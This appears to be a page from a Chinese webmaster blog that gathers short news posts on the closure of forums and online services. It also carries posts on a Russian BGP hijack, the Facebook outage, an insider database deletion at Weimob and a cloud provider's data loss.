在此特别感谢狗仔直播用户的支持和陪伴,我们将始终秉承”让表达和获取信息更加简单"的使命,持续为大家提供更多优质产品和服务,请继续保持对我们的关注和期待。特此公告。 狗仔直播团队 2019年3月28日 #### 又一知名网站关闭:营销中国宣布关闭网站 近日,站长之家消息:国内知名的“黑鹰安全网”原班人马打造的营销培训网站“营销中国”宣布即将于2020年12月30日关闭,正式关站! 营销中国站长“大米”,原黑鹰安全网站长,拥有十多年互联网从业经验。熟知网络营销、电子商务、各种网络赚钱方法。精通百度竞价,曾带领团队通过百度竞价创造单月上百万的业绩。还是多家中小型企业的网络营销顾问。 营销中国是当年在黑客圈鼎鼎有名的“黑鹰安全网”原班人马组建的新网站,在黑客安全网2010年被警方以非法提供黑客工具行为将网站查封之后,黑客安全网站长东山再起带领原团队彻底转行,开始主攻网络营销培训,新上线了一个营销网站“营销中国”简答讲就是一个网赚站。 而且估计是为了安全,营销中国网站跟前身黑鹰安全网业务彻底断开,网站主要以网络营销,网络创业为主题,主要业务就是付费网络创业培训,包含网赚圈所有主流的:微信赚钱,游戏赚钱,站群赚钱,CPA赚钱,CPS赚钱,竞价赚钱,网盘赚钱,国外网赚,SEO赚钱,淘宝客赚钱等网络创业项目,借助当年黑客安全网在圈内的名气,营销中国在营销圈和网创圈一直有固定的的粉丝用户群体,也算小有名气! 但是没想到,最近这个网站也走到头了,关站原因其实很简单,因为网赚行业在搜索引擎已经几乎要消失了,上周百度搜索引擎还对网赚进行了屏蔽,现在在百度上已经很难搜到网赚的相关信息了,而且网赚行业也经常受到各种DDOS攻击,主机吧一位客户就每天被CC攻击几亿次,如果不是用了百度云加速,估计防御成本都高得一批,所以网赚这个行业看来要逐渐消失了,当然作为站长我们也不要灰心,一个行业倒下,另一个行业就会站起来,全世界只有国内互联网机会多多。 #### 又一知名论坛倒下:推18论坛宣布卖站 早一批做过网站推广的估计都知道推18论坛吧,主打SEO交流,挺受欢迎的,以前一天几万帖子更新,相当有人气,主机吧以前也在里面混了个版主。 在上面发外链挺爽的,收录快,见效快,引流也高。创始者是搞网络营销培训的,还出过书。 不过随着移动互联网时代到来,不管是SEO还是论坛都已经没落了,估计培训也搞不动了,就停了,据说去搞电商去了,如今甚至打包推18论坛卖了。 恩,其实这个论坛已经基本废了,去年主机吧去看了下,已经没人更新了,甚至没有管理了。 站长之家查了下,百度收录高达60万,索引更是高达266万,看着数据挺多的,但其实已经没有什么排名了,主机吧估计每天流量最多2000,为何差距这么大呢?主要是因为现在百度对论坛权重是非常差的,我们随便搜一个关键词排前面的已经不见论坛的踪影了。 如果有人想买这论坛,主机吧估计是亏本生意,因为据主机吧了解,这个论坛数据量非常大的,保守估计十几G不只,主机吧记得之前推18服务器搬家,单搬家就搬了好几天可见数据量有多大。 一个日IP几千的网站,用十几G的数据,单服务器费都不够了。 #### 又一知名论坛关闭:TomPDA网站服务器即将到期关闭 9 月 11 日,TomPDA发布公告,称网站服务器今年 10 月 7 日到期,之后不再续费,仅保留域名。 TomPDA是一个论坛(BBS)的形式进行数码交易的社区,并且是比较早引入专业商家进驻的网站,当年Palm PDA、Windows Mobile、BlackBery、Symbian时代,是TomPDA最辉煌的时候。 不过,管理员坦承“这些年移动互联网飞速发展,闲鱼、转转等新型交易平台星期,传统BBS已不再适应时代”。 目前,TomPDA已经联系商家退保证金和商家费,站长也提醒网友尽快保存个人信息、帖子信息等。 截止发稿,TomPDA的新用户注册系统已经无法打开。 此前,塞班论坛、 52 黑莓等也因为智能手机大潮转型或逐渐消失在公众视野中。 #### 又一社区论坛关闭:QQ兴趣部落将在2月底全面停止运营 1月11日 消息:今日,QQ兴趣部落团队发布停运公告称,由于业务发展方向调整,兴趣部落(包括兴趣部落App、兴趣部落网页版及手机QQ端)将全面停止运营并下线。 2021年1月11日,发布内容,金豆充值功能将正式下架,保留打榜、评论功能;2021年1月25日,下架所有功能;2021年2月26日,兴趣部落将关闭服务器,正式停止运营。 据悉,“兴趣部落”是腾讯手机QQ于2014年推出的基于兴趣的公开主题社区,QQ用户可以在“兴趣部落”里实现交流讨论,也可加入相关联的QQ群进行实时聊天;其中功能包括了:附近话题、直播话题、活动版块、匿名部落、私房美图、部落名片等。 以下为公告全文: 尊敬的用户: 兴趣部落自上线以来,有幸见证大家在此相遇相识。由于业务发展方向调整,结局略有遗憾,我们要与大家告别了。兴趣部落(包括兴趣部落App、兴趣部落网页版及手机QQ端)将全面停止运营并下线,具体安排如下: 2021年1月11日,发布内容,金豆充值功能将正式下架,保留打榜、评论功能; 若有剩余已充值金豆未使用需要退款,可于2021年1月11日起至2月28日申请退款。安卓用户将用户ID以标题“【金豆退款申请】+用户ID(QQ或微信号)”的邮件发送至兴趣部落官方邮箱2091225895@qq.com申请退款;IOS用户请通过Apple官方退款渠道进行退款申请,若通过Apple官方退款失败,可提供苹果官方通知的退款失败的证明截图联系官方邮箱沟通退款事宜。 2021年1月25日,下架所有功能; 2021年2月26日,兴趣部落将关闭服务器,正式停止运营。 如有未尽事宜,请联系兴趣部落官方邮箱:2091225895@qq.com 或官方客服QQ:2091225895 对此给您造成的不便,我们深表歉意,并再次衷心感谢您一直以来的陪伴。同时也提醒广大用户,请尽快将您在兴趣部落中的重要内容进行备份保存。 山高水长,也许未来有一天,我们还会再见。 兴趣部落APP服务器关闭后,将不再保存用户相关资料及数据。(《网络安全法》《移动互联网应用程序信息服务管理规定》等相关法律法规另有规定或《兴趣部落软件许可及服务协议》《兴趣部落隐私保护指引》等相关协议另有约定的除外。) 兴趣部落团队 2021年1月11日 #### 又一站长因网站内容有非法链接被公安传唤了 上次主机吧因为网站旧链接被非法人员利用,导致被当地网信办通报,还没过多久,今天主机吧逛4414论坛的时候,看到有位站长也中招了。 现在国内互联网管理确实非常严格,网站一点问题都很容易被相关通报。 不只网站,连做视频也是,视频上多一张图,或者话说错了,也会被有心人告,造成经济损失。 所以各位站长,平时做内容的时候一定要小心小心更小心了。 #### 又一站长退圈了 最近在4414站长论坛看到一帖子,挺感慨的,转发下标题是这样的《 总有太多场外因素阻止你做站,感觉也是时候退出站长这一行了 》作者:阳光灿烂 这年头,做个网站实在是太难了,尤其是个人办站。 首先从源头上卡。不BA,不给办,BA了就限制你做各种行业内容,偷偷做,又怕被查到,一被查到,多年的心血付之东流。 19年的时候办了一个股票站,分享一些炒股技巧的东西,慢慢积累下来,手机注册用户超过3000了,百度收录也有2W了,网站月小收入也有1000(谷歌+用户充值)。 最害怕的事情终于还是发生了,20年11月份,有用户反映网站突然不能访问了,多方查询,是被一个省给禁止了DNS解析,造成了这个省的一些地方不能正常访问网站。 摊上这种事情,做站第一次有心灰意冷的感觉,网站停止更新了2个月,在不断有用户问做怎么不更新的情况下,还是重新继续,首先是换域名,搬服务器。 把服务器搬到了香港,注册了一个新域名,把旧域名301定向到新的域名,然后到各大搜索引擎去提高改版和收录。一个月忙活下来,流量算是稳定下来了,虽然只有曾经的一半。 没想到又来一波打击,前面说到个人办站,涉及到支付环节的,必然只能借助支付宝腾讯以外的第三方的支付平台来做,就是挂靠在别人公司账上,交个账号开通费用+每天交易的佣金提成。反正个人只能接受这种协议了。 网站收费主要在涉及在两个地方:1、会员费(月会员10元,1年98,终身198),2、PDF文档的下载(9成的文档是按1元的价格来下载)。 开通后,顺利的收了3个月的款,微信就说收款异常,禁止你的账号收款了。(算下来,平均一个月也就100块钱左右),那好吧,还有支付宝在,至少还有点活路。没想到,现在支付宝也被禁止收款,收入来源直接就断了。 做这行,实在是太难了。 网站也不想做了,想转让关掉了。   从站长帖子内容可以看到,站长主要是因为网站内容的原因,被国内各种限制,导致要退圈。其实这几年个人网站可做的内容已经越来越少了,都有限制,带点商业的都要求企业备案。 当然也不是个人站长就无路可走,主机吧在百度QQ群里就见到一些个人站长做得风声水起,其实做网站一定要选对行,有些行业个人站长是不能碰的,比如影视、音乐、图片等版权严重的,或者一些非法灰色行业的也不要去碰,只怕有本事赚钱,没本事花。个人站长只要做一个正规的行业,勤勤恳恳,收入还是不错的。主机吧认识一位大佬,一个个人网站,靠百度联盟广告,一天收入都4000+,相当厉害。所以咱也不要心灰意冷,网站行业还是相当有前途的。 #### 又一网络相册关停:新浪博客宣布“相册”功能下线8月停止导出 继网易相册之后,新浪博客也宣布相册功能即将下线。相册导出时间开放到 2019 年 7 月 31 日 24 时。 公告称,由于产品的升级与调整,相册功能即将下线。为了保障大家的权益,新浪博客开通了“相册数据导出”功能,你可以自行将所有状态正常的图片一键下载到本地,以便留存和管理。 新浪博客表示,下线相册功能是一个极其艰难的决定。他们的心里,也和大家一样是万般不舍。毕竟,那一张张相片并不只是简单的定格影像,它们也同样承载着新浪博客从雏形再到慢慢长大的美好记忆。但是,天下没有不散的宴席,是时候往前看了。 导出博客图片链接:点此。 以下是公告全文: 新浪博客“相册”功能下线公告 亲爱的新浪博客用户: 我们非常遗憾地通知您,由于产品的升级与调整,相册功能即将下线。为了保障大家的权益,我们开通了“相册数据导出”功能,您可以自行将所有状态正常的图片一键下载到本地,以便留存和管理。 相册功能,自上线以来就深受广大用户们的喜爱。大家使用相册功能记录生活,分享生活。虽然时间总是飞逝,但是当我们每次打开相册的时候,那些画面和回忆总会扑面而来,或感动、或温暖、或喜悦、或缅怀。有时候看到照片,就会感觉那些鲜活的日子又重现了一样。每每想到此,我们都深深地以为大家提供了相册功能而感到骄傲与欣喜,也为大家一直给予的信任和支持而感动。 因此,对于我们来说,下线相册功能是一个极其艰难的决定。我们的心里,也和大家一样是万般不舍。毕竟,那一张张相片并不只是简单的定格影像,它们也同样承载着新浪博客从雏形再到慢慢长大的美好记忆。但是,天下没有不散的宴席,是时候往前看了。 相册导出说明: 1. 相册导出功能开放到 2019 年 7 月 31 日 24 时,请您及时进行内容导出; 2. 导出的文档为图片链接列表,您点击任一图片链接地址,可以直接在浏览器中查看和下载图片; 3. 此功能仅能导出您状态正常的图片,因涉及低俗、广告等内容而被系统删除的内容无法导出; 4. 如果在您的操作中,遇到任何问题或者有任何建议,欢迎通过客服电话:400-690-0000,或者微博 @新浪博客@头条博客 私信联系我们; 5. 为此对您造成的任何不便,我们深感抱歉。 最后,时代在改变,新浪博客也将会在不断优化与创新的道路上砥砺前行,持续地为广大用户朋友们提供优质的服务。新浪博客是家,而你们就是我们的家人,非常感谢每一位家人长久以来的陪伴与支持。 未来的路还很长,我们会一直在。 新浪博客 2019 年 5 月 #### 又一老站宣布关闭:19年电子数码社区TomPDA彻底关站 当年玩数码、买二手的你听过或者用过TomPDA网站吗? 日前,TomPDA发布《网站停告信》,宣布在19岁生日之际宣布关站告别,所有服务均已下线,老ID们今后想交流只能通过微信群了。 实际上,早在3年前,TomPDA就发布公告称网站服务器即将到期,之后不再续费,仅保留域名。后来,网站又断断续续继续经营了一段时间,但最终没能保留火种。 据了解,TomPDA是一个论坛(BBS)的形式进行数码交易的社区,并且是比较早引入专业商家进驻的网站,当年Palm PDA、Windows Mobile、BlackBery、Symbian时代,是TomPDA最辉煌的时候。 不过,管理员坦承这些年移动互联网飞速发展,闲鱼、转转等新型交易平台星期,传统BBS已不再适应时代”。 此前,iMP3、塞班论坛、52黑莓等也因为行业变化,或转型或逐渐从公众视野消失。 这是一个时代的替换,主机吧不得不承认,网站的生存环境已经很难了,特别是这两年,靠搜索引擎流量的时代过去了,新一代网民不喜欢逛论坛,网站,而是逛APP、短视频,站长朋友们不得不思考下,转型问题了,就主机吧认识的一些大佬都开始玩别的了,比如卢松松,现在玩抖音去了,虽然效果一般。 主机吧最近在做APP、小程序,看看能不能运营得起来,当然主机吧是不会放弃网站的,加油! #### 又一论坛下线,锤子论坛宣布 11月15日起停止运营 10月15日 消息:就在刚刚,锤子官方发布公告称,锤子论坛将于近期停止服务和运营。 2021年10月16日00:00起,锤子论坛将停止新用户注册。2021年11月15日00:00起停止运营,关闭服务。 2018年下半年,锤子科技出现经营危机,2018年12月底,字节跳动宣布收购锤子科技部分专利使用权。 今年1月,字节跳动表示将暂停手机业务,原锤子科技团队组建的新石实验室,并入教育硬件团队,合并后不再研发坚果手机等产品。。 对此,字节跳动回应称,坚果手机用户的服务将不受影响,售后和系统维护会继续,并且坚果手机也会持续探索 SmartisanOS的创新机会。 以下为锤子公告全文: 锤子论坛将于近期停止服务和运营。 本次调整对坚果手机用户没有影响,官网在线咨询、400热线、新浪微博@坚果手机客服会正常运营,继续为用户提供服务。 论坛具体下线时间安排如下: 2021年10月16日00:00起停止新用户注册。 2021年11月15日00:00起停止运营,关闭服务。锤子论坛将无法登录、发布内容、查看已发布内容及查看其他人发布的内容。 论坛越来越少了哈,会不会有一天彻底消失呢? #### 又一论坛倒塌!落伍者论坛因监管问题关闭一个月 知名站长论坛落伍者,突然发布发布一条信息称:落伍者将于本月20日起进入严管。 帖子内容为,接政府有关部门通知,落伍暂停用户注册,自2018/10/20起,晚上11点后发帖暂停,时间约30天左右。 目前落伍者论坛,大部分帖子都均打不开状态,对于搜索引擎来说,这一个月肯定是大量拔毛的,看来要凉凉了。 这几年国内各大论坛纷纷关闭,网易论坛、站长之家论坛、中华网论坛、环球网论坛、搜狐论坛先后关闭。曾经风靡一时的BBS社区已经成为了过去式。 主机吧所在的城市北海365网人气也大不如前,这也体现了国内网民的上网娱乐方式在改变,他们更愿意花更多时间来刷抖音,看朋友圈了,以前没事看看论坛的习惯不存在了。 如有站长还在考虑做论坛社区的,应该要考量考量是否有前途。 #### 又一论坛关停:HTC官方社区正式关闭 HTC官方发布公告,从2020年2月7日起,HTC官方社区将正式关闭。HTC中国官方社区发布公告称,将于2020年2月7日起关闭社区,并感谢用户一直以来对HTC官方社区的关注与支持。 HTC曾经是全球最大的Windows Mobile智能手机生产商,也曾经是全球最大的智能手机代工和生产厂商。 作为安卓阵营的“头号玩家”,HTC于2008年9月推出了全球第一款安卓手机G1,旗下机型横跨Windows Phone、安卓两大阵营。然而随着华为、OPPO、vivo、小米等手机品牌的强势崛起,HTC在全球市场份额逐步流失。 2019年一年HTC未更新旗舰产品,并在去年关闭了京东、天猫官方旗舰店,当前HTC主要精力用于VR,属于HTC的手机时代已经不复存在了。 论坛网站何去何从呢?值得站长思考…… #### 又一论坛关闭:Emlog官方论坛宣布关闭 近日,Emlog官方论坛宣布将关闭,原因是论坛人气不行,很没人发贴了,所以宣布关闭了。 由于众所周之原因,论坛的人气已经不如前了,移动时代的到来,以往的论坛已经基本死完了,这次Emlog关闭也是迟早的事,不过这次关闭还给我们了解到一件事,Emlog要收费了,恩,这很现实,毕竟国内已经没有开源环境了,开源正在慢慢被杀死,不仅国内,国外也是,开源很难盈利,没有哪个开发商愿意花大把时间去开发一个没有盈利的项目,所以收费是很正常的。 #### 又一论坛宣布关闭 多玩游戏论坛12月31日后停止服务 12月11日 消息:12 月 10 日,多玩论坛发布服务迁移及业务升级公告,宣布将于年底关闭。公告称论坛将于 12 月 31 日后停止服务,后续原多玩论坛业务将由虾哥论坛承接。这意味着国内游戏社区又要少一个了。 多玩游戏成立于 2005 年,是欢聚时代旗下人气游戏资讯平台。官方公告表示,互联网时代风云变化,多玩网为了适应新的环境需要进行改变。为了与YY更好的结合,为玩家朋友们提供服务,多玩业务将进行重装升级。多玩游戏资讯网站、多玩游戏专区等相关业务将在升级后以全新的面貌与您相见。 以下是多万论坛官方公告: 多玩游戏,多交朋友。 很庆幸在多玩成长的路上,一直有诸多玩家朋友们的陪伴。 但可惜,天下没有不散的宴席。互联网时代风云变化,多玩网为了适应新的环境需要进行改变。为了与YY更好的结合,为玩家朋友们提供服务,多玩业务将进行重装升级。 多玩游戏论坛将于 2019 年 12 月 31 日停止服务。后续多玩论坛业务将由虾哥论坛承接,您可以前往虾哥论坛参与游戏话题讨论:http://xiage.yy.com/forum.php?gid=213 多玩游戏资讯网站、多玩游戏专区、等相关业务将在升级后以全新的面貌与您相见。 如果您有未解决的问题,可以联系YY客服反馈。我们会第一时间协助您解决。 非常感谢所有朋友们一直以来的支持与陪伴,祝朋友们能继续玩的愉快。 多玩游戏,多交朋友,让我们江湖再见! #### 又一论坛宣布关闭:《英雄联盟》拳头官方游戏论坛下周关闭 据PCgamer报道,因用户流失严重,拳头公司宣布将在一周后关闭《英雄联盟》论坛。 公告显示:《英雄联盟》论坛将从 2020 年 3 月 9 日开始关闭,届时论坛会改为只读状态,但是仍旧能够访问。不过在 3 月 16 日后,论坛将会完全关闭,所有未保存内容都会丢失。因此,提醒用户需要在此期间保存自己想要的内容。 据了解,《英雄联盟》由美国拳头游戏(Riot Games)开发,本次关闭的是海外官方游戏论坛。《英雄联盟》在中国大陆地区则由腾讯游戏代理运营。 #### 又一论坛宣布关闭:运营了18年的索尼官方PS论坛宣布关闭 这几年论坛(BBS)关站的特别多,一个接一个的BBS关站,甚至连国外的BBS都开始关站了,论坛没落已经到了不可挽回的地步了。 据悉,美国PlayStation论坛成立于2003年,从PS2开始,就已成为玩家交流心得、分享游戏经验的核心地带。对此,论坛官方管理员也表示,希望玩家可以继续通过PS官方博客、推特、Facebook以及Ins保持交流。 事实上,不只是美国玩家,PS官方论坛也是全球PS玩家的聚集地。很多国内媒体也都是从此处获得海外3A大作或游戏厂商的一手消息,对于国内玩家而言,PS论坛更是他们能够同步海外玩家的社交场地。 需要注意的是,在索尼宣布关闭PS官方论坛之前,HTC也关停了官方论坛。对此外媒认为,多家官方论坛的频繁关闭,或许是新型社交媒体对传统论坛冲击的一个缩影。在大家更习惯于便捷快速的移动社交时代下,拥有18年历史的PS官方论坛也无法幸免。 此外,也有人认为关闭论坛或与PS5即将发售有一定的关系。随着次世代主机的发售,索尼或将会推出新的社交模式。   #### 又一起 BGP 劫持事件,影响全球 200 多家云服务和 CDN 服务商 本周早些时候,来自全球200多家 CDN 和云托管提供商的流量被怀疑通过俄罗斯国有电信运营商Rostelecom转发出去。这起事件影响了来自200多个网络的8800多条互联网流量路由。这些受影响的公司都是云和CDN市场的知名公司,包括谷歌、亚马逊、Facebook、Akamai、Cloudflare、GoDaddy、Digital Ocean、Joyent、LeaseWeb、Hetzner和Linode。 想查看受害网络的完整列表,请参阅该Twitter消息流地址:https://twitter.com/search?q=AS12389%20(from%3Abgpstream)%20until%3A2020-04-07%20since%3A2020-04-01&src=typed_query 这起事件是一起典型的“ BGP劫持”。BGP的全称是边界网关协议,是用于全球互联网网络之间路由传输互联网流量的事实上的系统。整个系统在设计上非常脆弱,原因是任何参与的网络只要“撒谎”、发布BGP路由通告,声称其网络上有“Facebook服务器”,那么所有互联网实体都会将其视为合法目标,将所有的Facebook流量发送到劫持者的服务器。 在过去,HTTPS被广泛用于加密流量之前,BGP劫持让攻击者得以实施中间人(MitM)攻击,从而拦截和篡改互联网流量。 如今BGP劫持仍然很危险,因为它让劫持者可以记录流量,以便以后试图分析和解密流量,保护流量的加密技术因加密领域的进步而被削弱了。 自上世纪90年代中期以来,BGP劫持一直是互联网骨干网上的一大问题;多年来,通信领域的从业人员一直在竭力提高BGP协议的安全性,因此出现了ROV、RPKI以及最近的MANRS。然而,采用这些新协议方面的进度一直很缓慢,BGP劫持仍时有发生。 比如说,2018年11月,一家小型的尼日利亚ISP劫持了原本发送到谷歌网络的流量,而2019年6月,一大批欧洲移动流量通过中国最大的电信运营商中国电信重新路由传输。 专家们过去一再指出,并非所有BGP劫持都是恶意事件。大多数事件可能是由于操作人员误输入了ASN(自治系统编号,用于识别互联网实体身份的代码),因而意外劫持了某家公司的互联网流量。 然而,一些实体仍是BGP劫持的幕后主使,许多专家认为这些事件不绝仅仅是意外事件。 虽然Rostelecom(AS12389)不像之前一些国家的运营商那样直接参与或有意参与BGP劫持,但它与许多类似的可疑事件有瓜葛。 Rostelecom上一次备受媒体关注的重大破坏出现在2017年,当时这家电信公司劫持了全球一些最大金融机构的BGP路由,包括维萨、万士达卡和汇丰银行(HSBC)。 当时,思科的BGPMon部门称该事件是“出于好奇心”,因为它似乎只影响金融服务,而不是影响随机性ASN。 这回,电信业还没有得出一个结论。BGPMon的创始人Andree Toonk给出了俄罗斯电信公司值得怀疑的理由。Toont在推特上称,他认为之所以发生这起“劫持”,是由于Rostelecom内部的流量整形系统可能不小心在公共互联网上、而不是在Rostelecom的内部网络上暴露了错误的BGP路由。 遗憾的是,Rostelecom的上游提供商在互联网上重新分发这条刚发布的BGP路由,使这个小错误变得更严重了,在短短几秒钟内放大了BGP劫持。 然而,过去许多互联网专家指出,有可能使一起有意的BGP劫持貌似意外事件,因为没人区别得了。政府严加控制的电信公司发生的BGP劫持一直被视为很可疑,这主要出于政治原因,而不是出于技术原因。 #### 又一起BGP路由故障事件:Facebook 大瘫痪,6个小时无法访问 在BGP路由问题导致全球性故障持续六个多小时后,Facebook、Instagram和WhatsApp开始重新上线。 今天美国东部标准时间上午11点50分前后,这三大网站都突然无法访问,浏览器在尝试打开它们时显示DNS错误。   Facebook CTO Mike Schroepfer在Twitter平台上向全球用户表示歉意,但他们没有解释具体发生了什么故障。Schroepfer之前就宣布自己明年年初离职,没想到最后三个月却遭遇这样的尴尬局面。 今天美国东部标准时间上午11点50分前后,这三大网站都突然无法访问,浏览器在尝试打开它们时显示DNS错误。 视频号 用户试图直接连接到下列Facebook DNS服务器时,也无法访问它们。 无法连接到Facebook的DNS服务器由于DNS协议将网站的IP地址告诉用户的操作系统和浏览器网站,而DNS服务器无法访问,因此无法连接到它们。BGP路由问题导致故障 虽然起初这个问题似乎与DNS有关,但后来查明问题比这个要严重得多。正如亚马逊AWS的首席技术客户经理(TAM)Giorgio Bonfiglio所解释的那样,各种Facebook路由前缀突然从互联网的BGP路由表中消失,实际上使得用户无法连接到托管在其IP地址上的任何服务。BGP即边界网关协议是现代互联网依赖以运作的基石,决定着全球这一头的计算机如何连接到另一头的设备。为了便于理解,BGP路由协议就好比互联网“邮政系统”,便于将数据包从一个(自治)网络系统传输到到另一个网络系统。一个网络想要在互联网上被广大系统或用户看到,它们就需要向全世界公告它们的路由或前缀。如果删除了这些前缀,互联网上的其他任何人不知道如何连接到它们的服务器。由于Facebook将其组织配置成使用域名注册商和托管在自己路由前缀上的DNS服务器,一旦这些前缀被删除,没有人可以连接到这些IP地址以及运行在它们上面的服务。从美国东部标准时间下午5点开始,Facebook路由前缀开始出现在其他网络的BGP路由表上。由于这些前缀如今在互联网上被公告,用户可以再次连接到Facebook、Instagram和WhatsApp。 目前还不清楚是什么导致了今天的故障,但很可能归咎于配置错误,就像过去出现的其他许多与BGP有关的故障。由于Facebook的电子邮件服务器也因该故障而无法访问,BleepingComputer之前发过去的电子邮件被退回。这是这家科技巨头自2008年以来最严重的故障,当年一个故障导致Facebook瘫痪了近一天,不过那时候其服务只有8000万用户。周一,Facebook股价以下跌5%收盘。 #### 又一起删库跑路事件:微盟系统遭遇运维破坏 来自微盟官网的消息,微盟的业务系统数据库(包括主备)遭遇其公司运维人员的删除。目前微盟技术团队正在努力恢复数据,但数据恢复较慢。目前对新用户服务已经恢复正常,但老用户数据官方预计要到 2 月 28 日才有结果。 删库跑路事件屡发,在这里我们也要特别提醒各个公司,注意做好两项工作: 更严密的权限管理:大部分公司对运维的权限都放得比较宽,容易造成事故 更可靠的备份机制:主备都是可以被删的,一旦需要从磁盘恢复,恢复时间会很慢 其次,作为技术人员,千万不要因为一时脑热,做出错误的决定,让自己身陷囹圄。 以下是官方公告的截图: 尊敬的微盟商户: 和您一样,我们一起度过了煎熬的 36 小时,我们预计此次故障还会持续一段时间,现就此次系统故障作如下通告: 2 月 23 日 19 点,我们收到系统监控报警,服务出现故障,随后我们立刻召集相关技术人员进行定位,发现大面积服务集群无法响应,生产环境及数据遭受严重破坏。我们立刻启动紧急响应机制,并与腾讯云技术团队一起研究制定生产环境和数据修复方案。 截止到 2 月 25 日 7 点,我们的生产环境和数据修复都在有序的进行,我们预计 2 月 25 日晚上 24 点前我们的生产环境将修复完成,微盟所有新用户将可恢复服务,老用户由于数据修复时间问题,我们将提供临时过渡方案,我们预计老用户数据修复将可在 2 月 28 日晚上 24 点前完成。 我们事后对恶意破坏生产环境的犯罪嫌疑人进行追踪分析,成功定位到犯罪嫌疑人登录账号及IP地址,并于 2 月 24 日向宝山区公安局报案,目前犯罪嫌疑人已经被宝山区公安局进行刑事拘留,犯罪嫌疑人承认了犯罪的事实。犯罪嫌疑人乃微盟研发中心运维部核心运维人员贺某,贺某于 2 月 23 日晚 18 点 56 分通过个人VPN登入公司内网跳板机,因个人精神、生活等原因对微盟线上生产环境进行了恶意的破坏。 针对此次事故微盟深表歉意,我们正在拟定相关赔付方案来补偿因此次事故而遭受损失的商家,我们对此次因人为造成的事故灾难无比愧疚,我们今后将一定吸取这个惨痛的教训,加强对线上运维的治理,同时我们也对因远程办公而疏忽对员工的精神状态的关注而深表痛惜! 微盟集团 #### 又一问答APP关闭:字节跳动旗下悟空问答App将于2月3日停止运营 1月14日 消息:今日,字节跳动旗下悟空问答发布公告称,2月3日起将停止运营,关闭服务,届时悟空问答APP将无法注册、登录、发布内容、查看已发布内容及查看其他人发布的内容。 资料显示,悟空问答是一款靠谱的问答社区,专注分享知识、经验、观念。2017年6月,头条问答正式更名悟空问答。 2020年9月,国家网信办部署开展为期两个月的集中专项整治,督促“悟空问答”等20家重点“知识社区问答”平台开展自查自纠。 据悉,就在不久前,字节跳动旗下另一款APP“好好学习”也宣布将于2021年1月20日停止运营。 以下为悟空问答公告全文: 亲爱的悟空问答创作者: 悟空问答APP将于近期停止服务和运营,问答依旧会作为今日头条的重要体裁,以头条问答的形式继续运营。本次调整对帐号收益、内容推荐、帐号已有绑定关系以及帐号权益均无影响。我们会在未来加大对头条问答的投入力度,敬请保持对问答内容的创作动力和消费热情。 具体下线时间安排如下: .2021年1月20日00:00起从各大应用商店下线,悟空问答APP将无法下载 ·2021年2月3日00:00起停止运营,关闭服务,悟空问答APP将无法注册、登录、发布内容、查看已发布内容及查看其他人发布的内容。 悟空问答APP中的收益、粉丝、内容、收藏等都将迁移至今日头条APP及头条号后台 (https://mp.toutiao.com)和悟空问答pc端(https://www.wukong.com),创作者可转移至今日头条APP、头条号后台和悟空问答pc端继续进行创作。 #### 又云服务商因硬件故障导致服务器数据丢失无法恢复 今日收到一位名为美奔科技的代理商对云服务商恒创科技(SonderCloud)的投诉,其多个用户在使用其云服务,目前数据全部丢失。 恒创称因硬件故障导致服务器不可用数据丢失,已联系服务器提供商和多家专业数据恢复公司紧急恢复,但多次恢复失败,目前已确认数据无法恢复。 美奔对此表示强烈不满,称恒创很不负责任,要求其进行合理赔偿。但恒创只肯赔偿其1年的费用,美奔要求赔偿三年,云头条认为其合情合理,而且费用相对来说不多,但对方对此不理不睬,消失的无影无踪,完全不负责任的态度激怒了他,希望我们予以曝光。 这家云服务商并不知名,经查询其域名 henghost.com 并未在工信部备案,服务器位于香港: 其公司也注册在香港: 其官网: 建议大家购买云服务,尽量选择大厂,虽然相对来说价格稍贵,但服务相对靠谱,这里推荐下,诸如可选择:腾讯云、阿里云、UCloud、百度云、AWS、Azure、Google Cloud 等,这些云服务厂商在国内外节点较多,可满足大多用户需求。   后续:  秉着严谨求实的态度,我们就此事联系了恒创科技,以下为恒创科技官方回复: “美奔科技”使用的是恒创科技的原VPS 产品,这是旧版本架构。针对该架构,此前我们公告通知过原VPS客户免费升级到更安全的新的云平台(地址: (https://www.henghost.com/news/article/1674/),并郑重提示可能发生不可预知的风险,但遗憾的是,“美奔科技”截止故障发生时仍未进行迁移。 本次事件中,恒创监控到原VPS机器磁盘故障后,第一时间即组织存储专家,厂商技术人员紧急修复,但无奈修复失败。随即我们又紧急联系多家第三方专业数据恢复中心寻求帮助。虽多方努力,但最终仍无法恢复数据。 随后我们向客户说明情况并表达歉意,同时安排客户经理与“美奔科技”积极沟通。并根据恒创科技相关服务协议、规则以及行业惯例,提出如下补偿方案,以期最大限度地降低用户损失:“退还1年费用,并免费提供1年云服务器使用时长”。 目前,我方已与“美奔科技”达成共识,事件得到圆满解决。 长期以来,我方极力追求为用户提供持久、稳定、安全的服务。对于我们未能尽善尽美的保护用户数据,恒创科技深表歉意。我们将以此次事件引以为戒,全面审核各项产品质量及故障处理流程,进一步提升系统可用性,让曾经发生的故障成为我们不断进步和提高服务能力的源泉。 恩!云服务器还是做好备份的好,云服务器虽然很安全,但故障率还是有的,别迷信云服务器99.999%故障率,那都是针对整体的,个别故障率达不到这个概率,所以平时做好数据备份,以免造成不必要的麻烦。 #### 又开始抢钱啦!百度熊掌号即将上线对公认证收费 熊掌号认证是百度对熊掌号主体所提交的主体信息、资质文件进行甄别与核实的过程,有效期一年。认证通过后平台会将熊掌号认证详情展示给所有的用户,以证明这个帐号背后主体的基本合法性。熊掌号对公认证满足企业、媒体、其他组织等主体类型的认证需求。 2018年7月4号起,熊掌号对公认证将收取认证费用300元/年。 熊掌号对公认证权益 完成熊掌号对公认证可提高帐号的可信度,并获得相应的高级功能和权限。同时,用户可以在熊掌号不同展现页看到通过认证后熊掌号特有认证标识。 熊掌号认证标识: • 熊掌号主页认证标 • 搜索结果寻址卡认证标 高级功能权益: 主机吧点评:这几年各种认证着实眼花缭乱,而且收费都是300以上,比如百度官网认证,前几年就开始搞了除了在搜索企业名的时候显示官网字眼外,其它的一无事处。 比如:知道创宇的品牌宝,只要做了品牌宝在QQ上发地址才可以显示绿色图标,否者都是问号。主机吧算过,如果把各种认证做完,一个企业什么也没干,一年就得交上万元的费用。 想想也真恐怖!当然企业也可以选择不认证,不过不认证的话你会永远比别人低一级。 #### 又成功为一客户APP防御DDoS/CC攻击 